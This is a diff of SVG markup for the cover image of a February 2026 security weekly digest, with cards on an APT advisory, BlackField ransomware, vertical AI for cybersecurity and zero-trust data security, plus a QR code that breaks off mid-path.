-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8"/>
+  <!-- KPI card 120x100 -->
+  <g transform="translate(426,128)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E0A14" stroke="#E63946" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#F87171">SEVERITY</text>
+    <text x="60" y="62" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="900" fill="#F5F7FA">APT</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FBB6BD">BfV + BSI</text>
   </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <!-- Card 4: AI AGENT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22c55e" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22c55e" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22c55e" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22c55e" stroke-width="1.2" opacity="0.5"/>
+  <g fill="#F87171">
+    <circle cx="530" cy="24" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.8s" repeatCount="indefinite"/></circle>
+    <circle cx="546" cy="24" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" begin="0.3s" repeatCount="indefinite"/></circle>
   </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
+</g>
+
+<!-- CARD 02: BlackField Ransomware — HIGH / Ransomware (top-right) -->
+<g transform="translate(612,80)">
+  <rect x="0" y="0" width="556" height="248" rx="14" fill="url(#cardB)" stroke="#F59E0B" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" rx="2" fill="#F59E0B"/>
+  <rect x="0" y="0" width="556" height="4" fill="#F59E0B" opacity="0.65"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#F59E0B" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#FCD34D">02</text>
   </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FCD34D" letter-spacing="2.4">HIGH  /  RANSOMWARE</text>
+    <text x="74" y="57" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">BlackField Ransomware</text>
   </g>
-  <!-- Node: SEC OPS -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">THRE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">AI</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
+  <text x="20" y="98" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FDE68A">LockBit + Conti code reuse — RaaS evolution</text>
+  <!-- Code reuse illustration -->
+  <g transform="translate(26,116)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="80" height="30" rx="5" fill="#1A1000" stroke="#F59E0B" stroke-width="1.4"/>
+    <text x="40" y="19" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FCD34D">LockBit</text>
+    <rect x="0" y="38" width="80" height="30" rx="5" fill="#1A1000" stroke="#F59E0B" stroke-width="1.4"/>
+    <text x="40" y="57" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#FCD34D">Conti</text>
+    <path d="M88 15 L106 38" stroke="#F59E0B" stroke-width="1.8" stroke-dasharray="3 2" fill="none"/>
+    <path d="M88 53 L106 38" stroke="#F59E0B" stroke-width="1.8" stroke-dasharray="3 2" fill="none"/>
+    <rect x="110" y="20" width="90" height="38" rx="6" fill="url(#ransomGrad)" opacity="0.9"/>
+    <text x="155" y="42" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="900" fill="#FFFFFF">BlackField</text>
+    <g transform="translate(215,90)" stroke="#F59E0B" stroke-width="1.8" fill="none">
+      <rect x="-14" y="-10" width="28" height="20" rx="3" fill="#2A1A00" stroke="#F59E0B"/>
+      <path d="M-7 -10 L-7 -18 Q0 -24 7 -18 L7 -10"/>
+      <circle cx="0" cy="-2" r="3" fill="#F59E0B"/>
+    </g>
+    <text x="0" y="100" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#F59E0B">.blackfield</text>
+  </g>
+  <!-- Attack bullets -->
+  <g transform="translate(248,120)">
+    <circle cx="7" cy="7" r="4" fill="#F59E0B"/>
+    <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FDE68A">SMB lateral movement</text>
+    <g transform="translate(0,22)">
+      <circle cx="7" cy="7" r="4" fill="#F59E0B"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FDE68A">VSS deletion</text>
+    </g>
+    <g transform="translate(0,44)">
+      <circle cx="7" cy="7" r="4" fill="#F59E0B"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FDE68A">C2 exfiltration</text>
+    </g>
+    <g transform="translate(0,66)">
+      <circle cx="7" cy="7" r="4" fill="#F59E0B" opacity="0.6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="500" fill="#FCD34D">RaaS low-barrier entry</text>
+    </g>
+  </g>
+  <!-- KPI card -->
+  <g transform="translate(420,128)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#1E1000" stroke="#F59E0B" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#FCD34D">CODE REUSE</text>
+    <text x="60" y="60" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="900" fill="#F5F7FA">RaaS</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FDE68A">SK Shields EQST</text>
+  </g>
+</g>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+<!-- CARD 03: Vertical AI for Cybersecurity — HIGH / AI (bottom-left) -->
+<g transform="translate(32,348)">
+  <rect x="0" y="0" width="564" height="242" rx="14" fill="url(#cardC)" stroke="#3B82F6" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" rx="2" fill="#3B82F6"/>
+  <rect x="0" y="0" width="564" height="4" fill="#3B82F6" opacity="0.65"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#3B82F6" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#93C5FD">03</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#93C5FD" letter-spacing="2.4">HIGH  /  AI SECURITY</text>
+    <text x="74" y="57" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Vertical AI for Cybersecurity</text>
+  </g>
+  <text x="20" y="98" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#BFDBFE">Domain-specific AI: MITRE ATT&amp;CK + CVE fine-tuning</text>
+  <!-- Neural hub -->
+  <g transform="translate(120,170)">
+    <circle r="28" fill="#0A1B2E" stroke="#3B82F6" stroke-width="2.2" filter="url(#softShadow)"/>
+    <text y="-4" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#93C5FD">CYBER</text>
+    <text y="8" text-anchor="middle" font-family="Inter, monospace" font-size="8" font-weight="800" fill="#93C5FD">AI</text>
+    <g stroke="#3B82F6" stroke-width="1.2" stroke-dasharray="3 3" fill="none" opacity="0.75">
+      <line x1="0" y1="0" x2="-62" y2="-38"/>
+      <line x1="0" y1="0" x2="-62" y2="38"/>
+      <line x1="0" y1="0" x2="62" y2="-38"/>
+      <line x1="0" y1="0" x2="62" y2="38"/>
+      <line x1="0" y1="0" x2="0" y2="-54"/>
+      <line x1="0" y1="0" x2="0" y2="54"/>
+    </g>
+    <g fill="#93C5FD">
+      <circle cx="-62" cy="-38" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="2.0s" repeatCount="indefinite"/></circle>
+      <circle cx="-62" cy="38" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.8s" begin="0.3s" repeatCount="indefinite"/></circle>
+      <circle cx="62" cy="-38" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="2.3s" begin="0.6s" repeatCount="indefinite"/></circle>
+      <circle cx="62" cy="38" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="2.1s" begin="0.9s" repeatCount="indefinite"/></circle>
+      <circle cx="0" cy="-54" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="1.7s" begin="1.1s" repeatCount="indefinite"/></circle>
+      <circle cx="0" cy="54" r="7"><animate attributeName="opacity" values="0.4;1;0.4" dur="2.4s" begin="1.4s" repeatCount="indefinite"/></circle>
+    </g>
+  </g>
+  <text x="120" y="232" text-anchor="middle" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#93C5FD">threat detection</text>
+  <!-- Capabilities -->
+  <g transform="translate(226,124)">
+    <circle cx="7" cy="7" r="4" fill="#3B82F6"/>
+    <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFDBFE">Lower false positives</text>
+    <g transform="translate(0,22)">
+      <circle cx="7" cy="7" r="4" fill="#3B82F6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFDBFE">OSINT + Dark Web feed</text>
+    </g>
+    <g transform="translate(0,44)">
+      <circle cx="7" cy="7" r="4" fill="#3B82F6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#BFDBFE">Faster response time</text>
+    </g>
+    <g transform="translate(0,66)">
+      <circle cx="7" cy="7" r="4" fill="#3B82F6" opacity="0.6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="500" fill="#93C5FD">ATT&amp;CK fine-tuned model</text>
+    </g>
+  </g>
+  <!-- KPI card -->
+  <g transform="translate(426,118)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#0A1B2E" stroke="#3B82F6" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#93C5FD">ACCURACY</text>
+    <text x="60" y="62" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="28" font-weight="900" fill="#F5F7FA">AI+</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#BFDBFE">Vertical domain</text>
+  </g>
+</g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="83" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="73" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">SEC OPS</text>
-  <rect x="127" y="490" width="101" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">CLOUD SEC</text>
-  <rect x="240" y="490" width="110" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="295" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <rect x="362" y="490" width="92" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="408" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">AI AGENT</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
+<!-- CARD 04: Zero Trust Data Security — HIGH / Data (bottom-right) -->
+<g transform="translate(612,348)">
+  <rect x="0" y="0" width="556" height="242" rx="14" fill="url(#cardD)" stroke="#10B981" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="242" rx="2" fill="#10B981"/>
+  <rect x="0" y="0" width="556" height="4" fill="#10B981" opacity="0.65"/>
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#10B981" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#6EE7B7">04</text>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#6EE7B7" letter-spacing="2.4">HIGH  /  STRATEGY</text>
+    <text x="74" y="57" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Zero Trust Data Security</text>
+  </g>
+  <text x="20" y="98" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#A7F3D0">Data-centric strategy with AWS cloud best practices</text>
+  <!-- ZT stack -->
+  <g transform="translate(26,118)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="24" rx="5" fill="#062018" stroke="#10B981" stroke-width="1.2"/>
+    <text x="60" y="16" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#6EE7B7">Verify Identity</text>
+    <rect x="0" y="30" width="120" height="24" rx="5" fill="#062018" stroke="#10B981" stroke-width="1.2"/>
+    <text x="60" y="46" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#6EE7B7">Least Privilege</text>
+    <rect x="0" y="60" width="120" height="24" rx="5" fill="#062018" stroke="#10B981" stroke-width="1.2"/>
+    <text x="60" y="76" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#6EE7B7">Micro-segment</text>
+    <rect x="0" y="90" width="120" height="24" rx="5" fill="#062018" stroke="#10B981" stroke-width="1.2"/>
+    <text x="60" y="106" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#6EE7B7">Encrypt + Monitor</text>
+    <path d="M130 12 L148 12 L148 102 L130 102" stroke="#10B981" stroke-width="1.4" fill="none" stroke-dasharray="3 2"/>
+    <text x="152" y="60" font-family="Inter, monospace" font-size="9" font-weight="700" fill="#34D399">ZT</text>
+  </g>
+  <!-- Implementation bullets -->
+  <g transform="translate(246,120)">
+    <circle cx="7" cy="7" r="4" fill="#10B981"/>
+    <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#A7F3D0">NIST SP 800-207</text>
+    <g transform="translate(0,22)">
+      <circle cx="7" cy="7" r="4" fill="#10B981"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#A7F3D0">AWS data protection</text>
+    </g>
+    <g transform="translate(0,44)">
+      <circle cx="7" cy="7" r="4" fill="#10B981"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#A7F3D0">Continuous monitoring</text>
+    </g>
+    <g transform="translate(0,66)">
+      <circle cx="7" cy="7" r="4" fill="#10B981" opacity="0.6"/>
+      <text x="20" y="11" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="500" fill="#6EE7B7">Sigma detection rules</text>
+    </g>
+  </g>
+  <!-- KPI card -->
+  <g transform="translate(420,118)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="120" height="100" rx="10" fill="#062018" stroke="#10B981" stroke-width="1.8"/>
+    <text x="60" y="24" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" letter-spacing="2" fill="#6EE7B7">FRAMEWORK</text>
+    <text x="60" y="62" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="24" font-weight="900" fill="#F5F7FA">Zero</text>
+    <text x="60" y="84" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#34D399">Trust</text>
+  </g>
+  <g fill="#10B981">
+    <circle cx="520" cy="24" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="2.0s" repeatCount="indefinite"/></circle>
+    <circle cx="536" cy="24" r="1.4"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" begin="0.4s" repeatCount="indefinite"/></circle>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 08, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- Bottom strip -->
+<rect x="0" y="608" width="1200" height="22" fill="#040912" opacity="0.88"/>
+<text x="36" y="622" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="600" fill="#4A6080" letter-spacing="1.5">SIGNAL PHISHING  ·  BLACKFIELD RANSOMWARE  ·  VERTICAL AI  ·  ZERO TRUST</text>
+<text x="1164" y="622" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="500" fill="#4A6080" text-anchor="end" letter-spacing="1">tech.2twodragon.com</text>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/08/Tech_Security_Weekly_Digest_AI_Ransomware_Data/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM12 0h2v1h-2zM18 0h2v1h-2zM21 0h1v1h-1zM26 0h2v1h-2zM30 0h2v1h-2zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM12 1h2v1h-2zM16 1h2v1h-2zM23 1h1v1h-1zM27 1h3v1h-3zM32 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h1v1h-1zM16 2h2v1h-2zM19 2h1v1h-1zM21 2h3v1h-3zM26 2h1v1h-1zM29 2h1v1h-1zM32 2h1v1h-1zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM9 3h2v1h-2zM13 3h1v1h-1zM15 3h1v1h-1zM17 3h1v1h-1zM19 3h7v1h-7zM27 3h2v1h-2zM30 3h3v1h-3zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM10 4h3v1h-3zM16 4h2v1h-2zM19 4h1v1h-1zM25 4h1v1h-1zM27 4h1v1h-1zM32 4h1v1h-1zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h2v1h-2zM11 5h1v1h-1zM14 5h2v1h-2zM17 5h3v1h-3zM24 5h1v1h-1zM26 5h2v1h-2zM30 5h3v1h-3zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM9 7h3v1h-3zM13 7h5v1h-5zM19 7h4v1h-4zM24 7h1v1h-1zM27 7h3v1h-3zM31 7h1v1h-1zM0 8h1v1h-1zM3 8h1v1h-1zM5 8h2v1h-2zM8 8h2v1h-2zM11 8h2v1h-2zM15 8h1v1h-1zM19 8h1v1h-1zM21 8h1v1h-1zM25 8h2v1h-2zM32 8h2v1h-2zM35 8h1v1h-1zM0 9h2v1h-2zM3 9h3v1h-3zM9 9h1v1h-1zM12 9h2v1h-2zM16 9h2v1h-2zM21 9h1v1h-1zM24 9h3v1h-3zM29 9h1v1h-1zM32 9h1v1h-1zM37 9h4v1h-4zM0 10h1v1h-1zM2 10h5v1h-5zM8 10h1v1h-1zM11 10h2v1h-2zM14 10h1v1h-1zM17 10h4v1h-4zM22 10h1v1h-1zM24 10h1v1h-1zM26 10h1v1h-1zM30 10h2v1h-2zM35 10h5v1h-5zM0 11h1v1h-1zM2 11h4v1h-4zM7 11h1v1h-1zM11 11h3v1h-3zM16 11h1v1h-1zM18 11h1v1h-1zM21 11h1v1h-1zM24 11h3v1h-3zM28 11h1v1h-1zM33 11h2v1h-2zM36 11h1v1h-1zM38 11h1v1h-1zM40 11h1v1h-1zM3 12h6v1h-6zM10 12h1v1h-1zM13 12h1v1h-1zM15 12h3v1h-3zM19 12h3v1h-3zM25 12h11v1h-11zM37 12h1v1h-1zM39 12h1v1h-1zM0 13h1v1h-1zM8 13h1v1h-1zM10 13h2v1h-2zM16 13h2v1h-2zM20 13h1v1h-1zM22 13h2v1h-2zM25 13h1v1h-1zM27 13h1v1h-1zM30 13h4v1h-4zM37 13h2v1h-2zM0 14h1v1h-1zM4 14h1v1h-1zM6 14h2v1h-2zM12 14h1v1h-1zM14 14h1v1h-1zM16 14h4v1h-4zM21 14h1v1h-1zM23 14h1v1h-1zM27 14h2v1h-2zM30 14h1v1h-1zM34 14h1v1h-1zM37 14h4v1h-4zM0 15h1v1h-1zM2 15h2v1h-2zM5 15h1v1h-1zM7 15h2v1h-2zM10 15h5v1h-5zM17 15h2v1h-2zM20 15h4v1h-4zM25 15h2v1h-2zM28 15h5v1h-5zM34 15h2v1h-2zM1 16h1v1h-1zM6 16h2v1h-2zM9 16h3v1h-3zM17 16h1v1h-1zM22 16h1v1h-1zM27 16h1v1h-1zM29 16h1v1h-1zM31 16h2v1h-2zM35 16h1v1h-1zM39 16h1v1h-1zM0 17h1v1h-1zM3 17h3v1h-3zM9 17h1v1h-1zM11 17h1v1h-1zM13 17h5v1h-5zM19 17h1v1h-1zM21 17h1v1h-1zM23 17h2v1h-2zM26 17h3v1h-3zM34 17h2v1h-2zM37 17h4v1h-4zM2 18h1v1h-1zM4 18h4v1h-4zM9 18h3v1h-3zM15 18h1v1h-1zM17 18h1v1h-1zM22 18h1v1h-1zM25 18h1v1h-1zM33 18h2v1h-2zM36 18h1v1h-1zM40 18h1v1h-1zM0 19h1v1h-1zM2 19h1v1h-1zM5 19h1v1h-1zM8 19h2v1h-2zM11 19h2v1h-2zM14 19h1v1h-1zM16 19h1v1h-1zM19 19h3v1h-3zM25 19h1v1h-1zM29 19h1v1h-1zM32 19h4v1h-4zM37 19h1v1h-1zM40 19h1v1h-1zM3 20h4v1h-4zM8 20h3v1h-3zM12 20h4v1h-4zM17 20h1v1h-1zM19 20h2v1h-2zM22 20h3v1h-3zM26 20h2v1h-2zM32 20h3v1h-3zM38 20h2v1h-2zM1 21h3v1h-3zM8 21h1v1h-1zM11 21h1v1h-1zM14 21h4v1h-4zM19 21h4v1h-4zM25 21h1v1h-1zM29 21h1v1h-1zM34 21h1v1h-1zM38 21h3v1h-3zM0 22h11v1h-11zM15 22h6v1h-6zM24 22h2v1h-2zM28 22h1v1h-1zM31 22h1v1h-1zM33 22h4v1h-4zM38 22h2v1h-2zM0 23h2v1h-2zM4 23h2v1h-2zM7 23h5v1h-5zM15 23h2v1h-2zM18 23h5v1h-5zM25 23h2v1h-2zM28 23h1v1h-1zM30 23h1v1h-1zM34 23h1v1h-1zM38 23h2v1h-2zM0 24h3v1h-3zM5 24h2v1h-2zM8 24h5v1h-5zM16 24h2v1h-2zM19 24h3v1h-3zM23 24h3v1h-3zM27 24h3v1h-3zM31 24h5v1h-5zM37 24h1v1h-1zM39 24h1v1h-1zM1 25h2v1h-2zM5 25h1v1h-1zM9 25h1v1h-1zM11 25h2v1h-2zM14 25h1v1h-1zM17 25h1v1h-1zM19 25h4v1h-4zM24 25h3v1h-3zM28 25h2v1h-2zM31 25h1v1h-1zM34 25h1v1h-1zM37 25h1v1h-1zM39 25h1v1h-1zM0 26h3v1h-3zM4 26h1v1h-1zM6 26h3v1h-3zM10 26h1v1h-1zM12 26h2v1h-2zM15 26h3v1h-3zM20 26h1v1h-1zM23 26h1v1h-1zM25 26h2v1h-2zM28 26h1v1h-1zM30 26h1v1h-1zM32 26h5v1h-5zM39 26h2v1h-2zM0 27h1v1h-1zM4 27h2v1h-2zM8 27h1v1h-1zM12 27h1v1h-1zM14 27h2v1h-2zM17 27h2v1h-2zM20 27h3v1h-3zM24 27h4v1h-4zM29 27h1v1h-1zM32 27h1v1h-1zM40 27h1v1h-1zM0 28h2v1h-2zM4 28h1v1h-1zM6 28h2v1h-2zM10 28h1v1h-1zM14 28h1v1h-1zM17 28h1v1h-1zM21 28h4v1h-4zM26 28h2v1h-2zM29 28h2v1h-2zM32 28h2v1h-2zM35 28h1v1h-1zM3 29h1v1h-1zM5 29h1v1h-1zM8 29h2v1h-2zM12 29h2v1h-2zM17 